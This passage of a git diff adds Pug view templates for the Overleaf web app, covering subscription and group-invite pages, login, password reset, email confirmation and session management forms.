b/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug new file mode 100644 index 0000000..15f7948 --- /dev/null +++ b/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/subtotal-limit-exceeded' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#subtotal-limit-exceeded-root diff --git a/services/web/app/views/subscriptions/successful-subscription-react.pug b/services/web/app/views/subscriptions/successful-subscription-react.pug new file mode 100644 index 0000000..5ce208b --- /dev/null +++ b/services/web/app/views/subscriptions/successful-subscription-react.pug @@ -0,0 +1,12 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/successful-subscription' + +block append meta + meta(name="ol-subscription" data-type="json" content=personalSubscription) + meta(name="ol-postCheckoutRedirect" content=postCheckoutRedirect) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#subscription-success-root diff --git a/services/web/app/views/subscriptions/team/group-invites.pug b/services/web/app/views/subscriptions/team/group-invites.pug new file mode 100644 index 0000000..81c70f1 --- /dev/null +++ b/services/web/app/views/subscriptions/team/group-invites.pug @@ -0,0 +1,11 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-invites' + +block append meta + meta(name="ol-teamInvites" data-type="json" content=teamInvites) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt.team-invite#group-invites-root diff --git a/services/web/app/views/subscriptions/team/invite-managed.pug b/services/web/app/views/subscriptions/team/invite-managed.pug new file mode 100644 index 0000000..f59b8b4 --- /dev/null +++ b/services/web/app/views/subscriptions/team/invite-managed.pug @@ -0,0 +1,18 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/invite-managed' + +block append meta + meta(name="ol-inviteToken" content=inviteToken) + meta(name="ol-inviterName" content=inviterName) + meta(name="ol-expired" data-type="boolean" content=expired) + meta(name="ol-alreadyEnrolled" data-type="boolean" content=alreadyEnrolled) + meta(name="ol-validationStatus" data-type="json" content=validationStatus) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-groupSSOActive" data-type="boolean" content=groupSSOActive) + meta(name="ol-subscriptionId" data-type="string" content=subscriptionId) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt.team-invite#invite-managed-root diff --git a/services/web/app/views/subscriptions/team/invite.pug b/services/web/app/views/subscriptions/team/invite.pug new file mode 100644 index 0000000..dc1b509 --- /dev/null +++ b/services/web/app/views/subscriptions/team/invite.pug @@ -0,0 +1,17 @@ +extends ../../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/invite' + +block append meta + meta(name="ol-hasIndividualRecurlySubscription" data-type="boolean" content=hasIndividualRecurlySubscription) + meta(name="ol-inviterName" data-type="string" content=inviterName) + meta(name="ol-inviteToken" data-type="string" content=inviteToken) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-expired" data-type="boolean" content=expired) + meta(name="ol-groupSSOActive" data-type="boolean" content=groupSSOActive) + meta(name="ol-subscriptionId" data-type="string" content=subscriptionId) + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#invite-root diff --git a/services/web/app/views/subscriptions/team/invite_logged_out.pug b/services/web/app/views/subscriptions/team/invite_logged_out.pug new file mode 100644 index 0000000..d07fa53 --- /dev/null +++ b/services/web/app/views/subscriptions/team/invite_logged_out.pug @@ -0,0 +1,30 @@ +extends ../../layout-react + +block append meta + meta(name="ol-user" data-type="json" content=user) + +block content + - var colClass = bootstrapVersion === 5 ? 'col-lg-8 m-auto' : 'col-md-8 col-md-offset-2' + + main.content.content-alt.team-invite#main-content + .container + .row + div(class=colClass) + .card.text-center + .card-body + .page-header + // TODO: Remove `team-invite-name` once we fully migrated to Bootstrap 5 + h1.text-centered !{translate("invited_to_group", {inviterName: inviterName, appName: appName }, [{name: 'span', attrs: {class: 'team-invite-name'}}])} + + if (accountExists) + div + p #{translate("invited_to_group_login_benefits", {appName: appName})} + p #{translate("invited_to_group_login", {emailAddress: emailAddress})} + p + a.btn.btn-primary(href=`/login?redir=/subscription/invites/${inviteToken}${groupSSOActive ? "&hide_sso_login=true" : ""}`) #{translate("login_to_accept_invitation")} + else + div + p #{translate("invited_to_group_register_benefits", {appName: appName})} + p #{translate("invited_to_group_register", {inviterName: inviterName})} + p + a.btn.btn-primary(href=`/register?redir=/subscription/invites/${inviteToken}${groupSSOActive ? "&hide_sso_login=true" : ""}`) #{translate("register_to_accept_invitation")} diff --git a/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug b/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug new file mode 100644 index 0000000..c482629 --- /dev/null +++ b/services/web/app/views/subscriptions/upgrade-group-subscription-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/upgrade-group-subscription' + +block append meta + meta(name="ol-subscriptionChangePreview" data-type="json" content=changePreview) + meta(name="ol-totalLicenses", data-type="number", content=totalLicenses) + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#upgrade-group-subscription-root diff --git a/services/web/app/views/user/accountSuspended.pug b/services/web/app/views/user/accountSuspended.pug new file mode 100644 index 0000000..da57f4d --- /dev/null +++ b/services/web/app/views/user/accountSuspended.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - metadata.robotsNoindexNofollow = true + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container-custom-sm.mx-auto + .card + h3 #{translate('your_account_is_suspended')} + p #{translate('sorry_this_account_has_been_suspended')} + p !{translate('please_contact_us_if_you_think_this_is_in_error', {}, [{name: 'a', attrs: {href: `mailto:${settings.adminEmail}`}}])} diff --git a/services/web/app/views/user/addSecondaryEmail.pug b/services/web/app/views/user/addSecondaryEmail.pug new file mode 100644 index 0000000..8f38df9 --- /dev/null +++ b/services/web/app/views/user/addSecondaryEmail.pug @@ -0,0 +1,12 @@ +extends ../layout-react + +block vars + - var suppressNavbar = true + - var suppressSkipToContent = true + +block entrypointVar + - entrypoint = 'pages/user/add-secondary-email' + +block content + main.content.content-alt + #add-secondary-email diff --git a/services/web/app/views/user/compromised_password.pug b/services/web/app/views/user/compromised_password.pug new file mode 100644 index 0000000..e56ffd9 --- /dev/null +++ b/services/web/app/views/user/compromised_password.pug @@ -0,0 +1,13 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressGoogleAnalytics = true + +block entrypointVar + - entrypoint = 'pages/compromised-password' + +block content + main.content.content-alt#main-content + #compromised-password diff --git a/services/web/app/views/user/confirmSecondaryEmail.pug b/services/web/app/views/user/confirmSecondaryEmail.pug new file mode 100644 index 0000000..4d0c59e --- /dev/null +++ b/services/web/app/views/user/confirmSecondaryEmail.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressSkipToContent = true + +block entrypointVar + - entrypoint = 'pages/user/confirm-secondary-email' + +block append meta + meta(name="ol-email" content=email) + +block content + main.content.content-alt + #confirm-secondary-email diff --git a/services/web/app/views/user/confirm_email.pug b/services/web/app/views/user/confirm_email.pug new file mode 100644 index 0000000..37c0488 --- /dev/null +++ b/services/web/app/views/user/confirm_email.pug @@ -0,0 +1,60 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2.col-lg-6.col-lg-offset-3 + .card + .page-header(data-ol-hide-on-error-message="confirm-email-wrong-user") + h1 #{translate("confirm_email")} + form( + method="POST" + action="/logout" + id="logoutForm" + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden", name="redirect", value=currentUrlWithQueryParams) + form( + data-ol-async-form, + data-ol-auto-submit, + name="confirmEmailForm" + action="/user/emails/confirm", + method="POST", + id="confirmEmailForm", + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden", name="token", value=token) + + div(data-ol-not-sent) + +formMessages() + div(data-ol-custom-form-message="confirm-email-wrong-user" hidden) + h1.h3 #{translate("we_cant_confirm_this_email")} + p !{translate("to_confirm_email_address_you_must_be_logged_in_with_the_requesting_account")} + p !{translate("you_are_currently_logged_in_as", {email: getUserEmail()})} + .actions + button.btn-primary.btn.btn-block( + form="logoutForm" + ) #{translate('log_in_with_a_different_account')} + + .actions + button.btn-primary.btn.btn-block( + type='submit', + data-ol-disabled-inflight + data-ol-hide-on-error-message="confirm-email-wrong-user" + ) + span(data-ol-inflight="idle") + | #{translate('confirm')} + span(hidden data-ol-inflight="pending") + i.fa.fa-fw.fa-spin.fa-spinner(aria-hidden="true") + |  #{translate('confirming')}… + + div(hidden data-ol-sent) + .alert.alert-success + | #{translate('thank_you_email_confirmed')} + div.text-center + a.btn.btn-primary(href="/user/settings") + | #{translate('go_to_account_settings')} diff --git a/services/web/app/views/user/email-preferences.pug b/services/web/app/views/user/email-preferences.pug new file mode 100644 index 0000000..465ffed --- /dev/null +++ b/services/web/app/views/user/email-preferences.pug @@ -0,0 +1,49 @@ +extends ../layout-marketing +include ../_mixins/back_to_btns + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card + .page-header + h1 #{translate("newsletter_info_title")} + + p #{translate("newsletter_info_summary")} + + - var submitAction + if subscribed + - submitAction = '/user/newsletter/unsubscribe' + p !{translate("newsletter_info_subscribed", {}, ['strong'])} + else + - submitAction = '/user/newsletter/subscribe' + p !{translate("newsletter_info_unsubscribed", {}, ['strong'])} + + form( + data-ol-async-form + data-ol-reload-on-success + name="newsletterForm" + action=submitAction + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + p.actions.text-center + if subscribed + button.btn-danger.btn(type='submit', data-ol-disabled-inflight) + span(data-ol-inflight="idle") #{translate("unsubscribe")} + span(hidden data-ol-inflight="pending") #{translate("saving")}… + else + button.btn-primary.btn(type='submit', data-ol-disabled-inflight) + span(data-ol-inflight="idle") #{translate("subscribe")} + span(hidden data-ol-inflight="pending") #{translate("saving")}… + + if subscribed + p #{translate("newsletter_info_note")} + + .page-separator + +back-to-btns() diff --git a/services/web/app/views/user/login.pug b/services/web/app/views/user/login.pug new file mode 100644 index 0000000..9185b0b --- /dev/null +++ b/services/web/app/views/user/login.pug @@ -0,0 +1,52 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-6.col-md-offset-3.col-lg-4.col-lg-offset-4 + .card + .page-header + if login_support_title + h1 !{login_support_title} + else + h1 #{translate("log_in")} + form(data-ol-async-form, name="loginForm", action='/login', method="POST") + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + +customFormMessage('invalid-password-retry-or-reset', 'danger') + | !{translate('email_or_password_wrong_try_again_or_reset', {}, [{ name: 'a', attrs: { href: '/user/password/reset', 'aria-describedby': 'resetPasswordDescription' } }])} + span.sr-only(id='resetPasswordDescription') + | #{translate('reset_password_link')} + +customValidationMessage('password-compromised') + | !{translate('password_compromised_try_again_or_use_known_device_or_reset', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}, {name: 'a', attrs: {href: '/user/password/reset', target: '_blank'}}])}. + .form-group + input.form-control( + type='email', + name='email', + required, + placeholder='email@example.com', + autofocus="true" + ) + .form-group + input.form-control( + type='password', + name='password', + required, + placeholder='********', + ) + .actions + button.btn-primary.btn( + type='submit', + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("login")} + span(hidden data-ol-inflight="pending") #{translate("logging_in")}… + a.pull-right(href='/user/password/reset') #{translate("forgot_your_password")}? + if login_support_text + hr + p.text-center !{login_support_text} + diff --git a/services/web/app/views/user/one_time_login.pug b/services/web/app/views/user/one_time_login.pug new file mode 100644 index 0000000..89e1491 --- /dev/null +++ b/services/web/app/views/user/one_time_login.pug @@ -0,0 +1,20 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-6.col-md-offset-3.col-lg-4.col-lg-offset-4 + .card + .page-header + h1 We're back! + p Overleaf is now running normally. + p + | Please + | + a(href="/login") log in + | + | to continue working on your projects. diff --git a/services/web/app/views/user/passwordReset-bs5.pug b/services/web/app/views/user/passwordReset-bs5.pug new file mode 100644 index 0000000..7637a91 --- /dev/null +++ b/services/web/app/views/user/passwordReset-bs5.pug @@ -0,0 +1,76 @@ +extends ../layout-website-redesign-bootstrap-5 +include ../_mixins/recaptcha +include ../_mixins/notification + +block vars + - var suppressNavbar = true + - var suppressFooter = true + +block content + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main#main-content(data-ol-captcha-retry-trigger-area="") + a.auth-aux-logo(href="/") + img(src=buildImgPath("ol-brand/overleaf-o-dark.svg") alt=settings.appName) + .auth-aux-container + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/reset" + method="POST" + captcha=(showCaptcha ? '' : false) + captcha-action-name=(showCaptcha ? "passwordReset" : false) + ) + if error === 'password_reset_token_expired' + h1.h3.mb-3.mt-0 #{translate("sorry_your_token_expired")} + p #{translate('please_request_a_new_password_reset_email_and_follow_the_link')}. + else + h1.h3.mb-3.mt-0(data-ol-not-sent) #{translate("password_reset_sentence_case")} + h1.h3.mb-3.mt-0(hidden data-ol-sent) #{translate("check_your_email")} + p.mb-3.pb-3(data-ol-not-sent) #{translate("enter_your_email_address_below_and_we_will_send_you_a_link_to_reset_your_password")}. + + div(data-ol-not-sent) + +formMessagesNewStyle() + if error && error !== 'password_reset_token_expired' + +notification({ariaLive: 'assertive', type: 'error', className: 'mb-3', content: translate(error)}) + + div(data-ol-custom-form-message="no-password-allowed-due-to-sso" hidden) + +notification({ariaLive: 'polite', type: 'error', className: 'mb-3', content: translate("you_cant_reset_password_due_to_sso", {}, [{name: 'a', attrs: {href: '/sso-login'}}])}) + input(type="hidden" name="_csrf" value=csrfToken) + .form-group.mb-3 + label.form-label(for='email') #{translate("email")} + input.form-control#email( + aria-label="email" + type='email' + name='email' + required + autocomplete="username" + autofocus + ) + .actions + button.btn.btn-primary.w-100.mb-3( + type='submit' + data-ol-disabled-inflight + aria-label=translate('reset_password_sentence_case') + ) + span(data-ol-inflight="idle") + | #{translate("reset_password_sentence_case")} + span(hidden data-ol-inflight="pending") + | #{translate("requesting_password_reset")}… + a.btn.btn-ghost.w-100.mb-3(href="/login") #{translate("back_to_log_in")} + div(hidden data-ol-sent) + p.mb-4 #{translate('password_reset_email_sent')} + a.btn.btn-primary.w-100.mb-3(href="/login") #{translate('back_to_log_in')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/passwordReset.pug b/services/web/app/views/user/passwordReset.pug new file mode 100644 index 0000000..410e79f --- /dev/null +++ b/services/web/app/views/user/passwordReset.pug @@ -0,0 +1,84 @@ +extends ../layout-marketing +include ../_mixins/recaptcha + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main.content.content-alt#main-content(data-ol-captcha-retry-trigger-area="") + .container-custom-sm.mx-auto + .card + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/reset", + method="POST", + captcha=(showCaptcha ? '' : false), + captcha-action-name=(showCaptcha ? "passwordReset" : false), + ) + if error === 'password_reset_token_expired' + h3.mt-0.mb-2 #{translate("sorry_your_token_expired")} + p #{translate('please_request_a_new_password_reset_email_and_follow_the_link')}. + else + h3.mt-0.mb-2(data-ol-not-sent) #{translate("password_reset")} + h3.mt-0.mb-2(hidden data-ol-sent) #{translate("check_your_email")} + p(data-ol-not-sent) #{translate("enter_your_email_address_below_and_we_will_send_you_a_link_to_reset_your_password")}. + + div(data-ol-not-sent) + +formMessages() + if error && error !== 'password_reset_token_expired' + div.alert.alert-danger.mb-2( + role="alert" + aria-live="assertive" + ) + | #{translate(error)} + + div(data-ol-custom-form-message="no-password-allowed-due-to-sso" hidden) + .notification.notification-type-error(aria-live="polite" style="margin-bottom: 10px;") + .notification-icon + span.material-symbols.material-symbols-rounded(aria-hidden="true") error + .notification-content-and-cta + .notification-content + p + | !{translate("you_cant_reset_password_due_to_sso", {}, [{name: 'a', attrs: {href: '/sso-login'}}])} + + input(type="hidden", name="_csrf", value=csrfToken) + .form-group.mb-3 + label(for='email') #{translate("email")} + input.form-control#email( + aria-label="email" + type='email', + name='email', + placeholder=translate("enter_your_email_address"), + required, + autocomplete="username", + autofocus + ) + .actions + button.btn.btn-primary.w-100( + type='submit', + data-ol-disabled-inflight, + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate("request_password_reset")} + span(hidden data-ol-inflight="pending") + | #{translate("requesting_password_reset")}… + div(hidden data-ol-sent) + p.mb-4 #{translate('password_reset_email_sent')} + a(href="/login") #{translate('back_to_log_in')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/primaryEmailCheck-bs5.pug b/services/web/app/views/user/primaryEmailCheck-bs5.pug new file mode 100644 index 0000000..0828c06 --- /dev/null +++ b/services/web/app/views/user/primaryEmailCheck-bs5.pug @@ -0,0 +1,38 @@ +extends ../layout-website-redesign-bootstrap-5 + +block content + main#main-content + .auth-aux-container + img.w-50.d-block(src=buildImgPath("ol-brand/overleaf.svg") alt=settings.appName) + h1.h3.mb-3 #{translate("keep_your_account_safe")} + div(data-ol-multi-submit) + p.small.mb-4 + | !{translate("primary_email_check_question", { email: getUserEmail() }, ["strong"])} + form( + data-ol-async-form + action="/user/emails/primary-email-check" + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessagesNewStyle() + + button.btn.btn-primary.w-100.mb-3( + type='submit' + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("yes_that_is_correct")} + span(hidden data-ol-inflight="pending") #{translate("confirming")}… + + a.btn.btn-secondary.w-100.mb-4( + href="/user/settings#add-email" + data-ol-slow-link + event-tracking="primary-email-check-change-email" + event-tracking-mb="true" + event-tracking-trigger="click" + ) + span(data-ol-inflight="idle") #{translate("no_update_email")} + span(hidden data-ol-inflight="pending") #{translate("redirecting")}… + p.small.mb-2 + | #{translate("keep_your_email_updated")} + p.small + | !{translate("learn_more_about_emails", {}, [{name: 'a', attrs: {href: '/learn/how-to/Keeping_your_account_secure', 'event-tracking': 'primary-email-check-learn-more', 'event-tracking-mb': 'true', 'event-tracking-trigger': 'click' }}])} diff --git a/services/web/app/views/user/primaryEmailCheck.pug b/services/web/app/views/user/primaryEmailCheck.pug new file mode 100644 index 0000000..8a0f1e6 --- /dev/null +++ b/services/web/app/views/user/primaryEmailCheck.pug @@ -0,0 +1,42 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .login-register-container.primary-email-check-container + .card.primary-email-check-card + img.primary-email-check-logo(src=buildImgPath("ol-brand/overleaf.svg") alt=settings.appName) + h3.primary-email-check-header #{translate("keep_your_account_safe")} + .login-register-form.primary-email-check-form(data-ol-multi-submit) + p.small + | !{translate("primary_email_check_question", { email: getUserEmail() }, ["strong"])} + form( + data-ol-async-form + action="/user/emails/primary-email-check" + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + + button.btn-primary.btn.btn-block.btn-primary-email-check-button.primary-email-confirm-button( + type='submit' + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("yes_that_is_correct")} + span(hidden data-ol-inflight="pending") #{translate("confirming")}… + + a.btn-secondary.btn.btn-block.btn-primary-email-check-button.primary-email-change-button( + href="/user/settings#add-email" + data-ol-slow-link + event-tracking="primary-email-check-change-email" + event-tracking-mb="true" + event-tracking-trigger="click" + ) + span(data-ol-inflight="idle") #{translate("no_update_email")} + span(hidden data-ol-inflight="pending") #{translate("redirecting")}… + p.small + | #{translate("keep_your_email_updated")} + p.small + | !{translate("learn_more_about_emails", {}, [{name: 'a', attrs: {href: '/learn/how-to/Keeping_your_account_secure', 'event-tracking': 'primary-email-check-learn-more', 'event-tracking-mb': 'true', 'event-tracking-trigger': 'click' }}])} diff --git a/services/web/app/views/user/reconfirm-bs5.pug b/services/web/app/views/user/reconfirm-bs5.pug new file mode 100644 index 0000000..8d9d139 --- /dev/null +++ b/services/web/app/views/user/reconfirm-bs5.pug @@ -0,0 +1,69 @@ +extends ../layout-website-redesign-bootstrap-5 +include ../_mixins/recaptcha + +block content + - var email = reconfirm_email ? reconfirm_email : "" + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main#main-content(data-ol-captcha-retry-trigger-area="") + .container.auth-aux-container(style="max-width: 420px;") + form( + data-ol-async-form + name="reconfirmAccountForm" + action="/user/reconfirm" + method="POST" + aria-label=translate('request_reconfirmation_email') + captcha=(showCaptcha ? '' : false) + captcha-action-name=(showCaptcha ? "passwordReset" : false) + ) + h1.h5.mb-3 #{translate("reconfirm_account")} + p #{translate('reconfirm_explained')} + | + a(href=`mailto:${settings.adminEmail}`) #{settings.adminEmail} + | . + + div(data-ol-not-sent) + +formMessagesNewStyle() + + input(type="hidden" name="_csrf" value=csrfToken) + .form-group.mb-3 + label.form-label(for='email') #{translate("please_enter_email")} + input.form-control( + aria-label="email" + type='email' + name='email' + placeholder='email@example.com' + required + autofocus + value=email + ) + .actions + button.btn.btn-primary.w-100( + style="white-space: normal;" + type='submit' + data-ol-disabled-inflight + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate('request_password_reset_to_reconfirm')} + span(hidden data-ol-inflight="pending") + | #{translate('request_password_reset_to_reconfirm')}… + div(hidden data-ol-sent) + div.alert.alert-success( + role="alert" + aria-live="polite" + ) + span #{translate('password_reset_email_sent')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/reconfirm.pug b/services/web/app/views/user/reconfirm.pug new file mode 100644 index 0000000..5db1d81 --- /dev/null +++ b/services/web/app/views/user/reconfirm.pug @@ -0,0 +1,73 @@ +extends ../layout-marketing +include ../_mixins/recaptcha + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + - var email = reconfirm_email ? reconfirm_email : "" + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main.content.content-alt#main-content(data-ol-captcha-retry-trigger-area="") + .container + .row + .col-sm-12.col-md-6.col-md-offset-3 + .card + h1.card-header.text-capitalize #{translate("reconfirm")} #{translate("Account")} + p #{translate('reconfirm_explained')}  + a(href=`mailto:${settings.adminEmail}`) #{settings.adminEmail} + | . + form( + data-ol-async-form + name="reconfirmAccountForm" + action="/user/reconfirm", + method="POST", + aria-label=translate('request_reconfirmation_email') + captcha=(showCaptcha ? '' : false), + captcha-action-name=(showCaptcha ? "passwordReset" : false) + ) + div(data-ol-not-sent) + +formMessages() + + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + label(for='email') #{translate("please_enter_email")} + input.form-control( + aria-label="email" + type='email', + name='email', + placeholder='email@example.com', + required, + autofocus + value=email + ) + .actions + button.btn.btn-primary( + type='submit', + data-ol-disabled-inflight, + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate('request_password_reset_to_reconfirm')} + span(hidden data-ol-inflight="pending") + | #{translate('request_password_reset_to_reconfirm')}… + div(hidden data-ol-sent) + div.alert.alert-success( + role="alert" + aria-live="polite" + ) + span #{translate('password_reset_email_sent')} + .row + .col-sm-12.col-md-6.col-md-offset-3 + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/register.pug b/services/web/app/views/user/register.pug new file mode 100644 index 0000000..c35f3c0 --- /dev/null +++ b/services/web/app/views/user/register.pug @@ -0,0 +1,35 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .registration_message + if sharedProjectData.user_first_name !== undefined + h1 #{translate("user_wants_you_to_see_project", {username:sharedProjectData.user_first_name, projectname:""})} + em #{sharedProjectData.project_name} + div + | #{translate("join_sl_to_view_project")}. + div + | #{translate("already_have_sl_account")} + a(href="/login") #{translate("login_here")} + else if newTemplateData.templateName !== undefined + h1 #{translate("register_to_edit_template", {templateName:newTemplateData.templateName})} + + div #{translate("already_have_sl_account")} + a(href="/login") #{translate("login_here")} + + .row + .col-md-8.col-md-offset-2.col-lg-6.col-lg-offset-3 + .card + .page-header + h1 #{translate("register")} + p + | Please contact + | + strong #{settings.adminEmail} + | + | to create an account. diff --git a/services/web/app/views/user/restricted.pug b/services/web/app/views/user/restricted.pug new file mode 100644 index 0000000..949bd9b --- /dev/null +++ b/services/web/app/views/user/restricted.pug @@ -0,0 +1,16 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content#main-content + .container + .row + .col-md-8.col-md-offset-2.text-center + .page-header + h2 #{translate("restricted_no_permission")} + p + a(href="/") + i.fa.fa-arrow-circle-o-left(aria-hidden="true") + | #{translate("take_me_home")} diff --git a/services/web/app/views/user/sessions.pug b/services/web/app/views/user/sessions.pug new file mode 100644 index 0000000..99905a9 --- /dev/null +++ b/services/web/app/views/user/sessions.pug @@ -0,0 +1,72 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card.clear-user-sessions + .page-header + h1 #{translate("your_sessions")} + + if currentSession.ip_address && currentSession.session_created + h3 #{translate("current_session")} + div + table.table.table-striped + thead + tr + th #{translate("ip_address")} + th #{translate("session_created_at")} + tr + td #{currentSession.ip_address} + td #{moment(currentSession.session_created).utc().format('Do MMM YYYY, h:mm a')} UTC + + h3 #{translate("other_sessions")} + div + p.small + | !{translate("clear_sessions_description")} + + form( + data-ol-async-form + action='/user/sessions/clear' + method='POST' + ) + input(name='_csrf' type='hidden' value=csrfToken) + div(data-ol-not-sent) + if sessions.length == 0 + p.text-center + | #{translate("no_other_sessions")} + + if sessions.length > 0 + table.table.table-striped + thead + tr + th #{translate("ip_address")} + th #{translate("session_created_at")} + for session in sessions + tr + td #{session.ip_address} + td #{moment(session.session_created).utc().format('Do MMM YYYY, h:mm a')} UTC + + p.actions + .text-center + button.btn.btn-lg.btn-primary( + type="submit" + data-ol-disable-inflight + ) + span(data-ol-inflight="idle") #{translate('clear_sessions')} + span(hidden data-ol-inflight="pending") #{translate("processing")}… + + div(hidden data-ol-sent) + p.text-center + | #{translate("no_other_sessions")} + + p.text-success.text-center + | #{translate('clear_sessions_success')} + .page-separator + a.btn.btn-secondary.text-capitalize(href='/user/settings') #{translate('back_to_account_settings')} + | + a.btn.btn-secondary.text-capitalize(href='/project') #{translate('back_to_your_projects')} diff --git a/services/web/app/views/user/setPassword-bs5.pug b/services/web/app/views/user/setPassword-bs5.pug new file mode 100644 index 0000000..007ae5e --- /dev/null +++ b/services/web/app/views/user/setPassword-bs5.pug @@ -0,0 +1,90 @@ +extends ../layout-website-redesign-bootstrap-5 + +block vars + - var suppressNavbar = true + - var suppressFooter = true + +block content + main#main-content + a.auth-aux-logo(href="/") + img(src=buildImgPath("ol-brand/overleaf-o-dark.svg") alt=settings.appName) + .auth-aux-container + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/set" + method="POST" + data-ol-hide-on-error="token-expired" + ) + div( + hidden + data-ol-sent + ) + h1.h3.mb-3.mt-0 #{translate("password_updated")} + p.mb-4 #{translate("your_password_has_been_successfully_changed")}. + a.btn.btn-primary.w-100(href='/login') #{translate("log_in_now")} + + div(data-ol-not-sent) + h1.h3.mb-3.mt-0 #{translate("reset_your_password")} + p(data-ol-hide-on-error-message="token-expired") #{translate("create_a_new_password_for_your_account")}. + +formMessagesNewStyle() + + +customFormMessageNewStyle('password-contains-email', 'danger') + | #{translate('invalid_password_contains_email')}. + | #{translate('use_a_different_password')}. + + +customFormMessageNewStyle('password-too-similar', 'danger') + | #{translate('invalid_password_too_similar')}. + | #{translate('use_a_different_password')}. + + +customFormMessageNewStyle('token-expired', 'danger') + | #{translate('password_reset_token_expired')} + br + a(href="/user/password/reset") + | 